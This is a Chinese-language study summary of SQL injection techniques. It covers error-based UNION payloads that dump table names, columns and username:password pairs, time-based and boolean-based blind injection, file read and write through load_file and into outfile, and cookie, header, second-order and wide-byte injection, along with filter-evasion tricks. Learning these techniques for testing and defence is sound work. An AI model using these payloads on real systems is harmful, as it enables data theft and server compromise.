注入漏洞小总结
注入漏洞
注入漏洞是对于解释性语言,用户与服务器交互式可以输入语句,成为程序执行的一部分
一sql的基本语句
增:insert into 表名(列名) values(值)
删:delete from 表名 where 条件
改:update 表名 set 列名=新列名 where 条件
查:select 列名 from 表名 where 条件
二mysql的基本知识
1、5.x的版本存在一个数据库information_schema,存储数据库的原信息。在schemata存数据库名,在table存数据库名和表名,在columns存数据库名表名和字段名。
2、mysql注释:#或--空格或 /** / 。还有内联注释/* * / 只有mysql可以识别,利用此借以绕过防火墙
3、常用函数:
user()查看当前mysql登录用户名
database()查看当前使用mysql数据库名
version()产看当前mysql版本
三sql注入类型
1、基于报错的注入
id值一般闭合:id=1 id='1' id=('1') id=("1")
加‘ 进行判断,根据报错信息,进行闭合,并将之后的字符串注释掉,有双引号时无报错,用\进行转义看报错信息。
一般利用步骤:
(1)利用order by判断字段数
(2)利用union select 联合查询,获取表名 0‘ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
(3)获取字段名0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
(4)获取字段值0' union select 1,group_concat(username,0x3a,passsword),3 from users --+
(5)也可以利用user()等函数输出一些信息。如0' union select 1,user(),database()--+
post与get的区别:注入位置不同,无法通过浏览器直接修改和查看错误信息,需要通过插件来实现——使用bp截断
2、不再显示错误信息的盲注
盲注是向数据库发送true或flase的语句,通过返回的信息判断结果,有基于时间的盲注,有基于布尔的盲注
get基于时间与布尔的盲注
通过时间差来判断if (ascii(substr(database(),1,1))=115,1,sleep(3))
substr是将数据库的名字的从一移动一个位置的字符,通过ascii变为ascii值与115即s的ascii值进行比较,如果正确就执行一次sleep(3)
通过length(database()) ascii(substr(database(),1,1))> < = 某个值来不断猜解数据库的名称
post基于时间与布尔的盲注
与上基本相同,不过是用到bp,如时间可用 admin' and (select (if(length(database())>5,sleep(5),null)))
3、mysql注入读写文件
读:
前提:尽量有较高大权限,secure_file_prv的值必须不为空(可以在mysql.ini中配置)
在注入点构造 0' union select 1,load_file("绝对路径,中间要用//隔开"),3--+
写:
前提:general_log=on(可以在mysql.ini中配置)
在注入点构造 0' union select 1,'写入的内容',3 into outfile '绝对路径,中间用//隔开' --+
4、http头的注入信息
一些对用户输入的进行过滤,但一些插入到程序中的http头的信息没有过滤,可能有referer,user_agent等
5、cookie注入
cookie存在客户端,如果带入函数中,也不加过滤,可以在cookie处构造注入。查看cookie:可以在浏览器通过document.cookie查看。一些可能通过base64编码,所以构造的语句要进行base64编码
6、二次注入
首先用户向数据库提交信息,之后利用这些信息进行注入
如,用户首先注册一个admin'-- -的账户,在修改密码时,即可将admin的账户的密码修改为任意密码
其中因为没有相应过滤,且修改密码时的语句update 表名 set password= where username= and password=
当带入admin'-- - 后将后面的注释
7、access偏移注入
当得知表名,却无法通过暴力破解得到相应的字段名。通过数据库的自连接使数据库乱序,显示出偏移处的字段
order by 判断字段数,比如为10,通过union select 1,2,3,……,6,* from 表名,则10-6=4, 10-4* 2=2即通过union select1,2,a.id,b.id ,* from(admin as a inner join admin as b on a.id=b.id)
8、宽字节注入
php中可能通过addslashes函数将单引号等转义
这时如果mysql使用的是gbk编码可以用宽字节注入绕过
即用%df%27(%27是单引号的url编码)通过函数转义后变为%df%5c%27(%5c为/)
这时因为gbk编码占用两个字符,所以%df%5c组成到一起,使引号能够起作用闭合
四注入绕过
- 大小写绕过
- 双写绕过
- 通过url编码绕过
- mysql中通过内联注释绕过
- 绕过去除字符串的注入:这时不能用注释符注释掉后面的引号,可以通过 or '1'='1闭合后面的引号,如id=-1' union select 1,database(),'3在3处闭合
- 绕过去除and or 的注入:可以大小写,双写,内联用&& ||等
- 绕过空格:可以通过url编码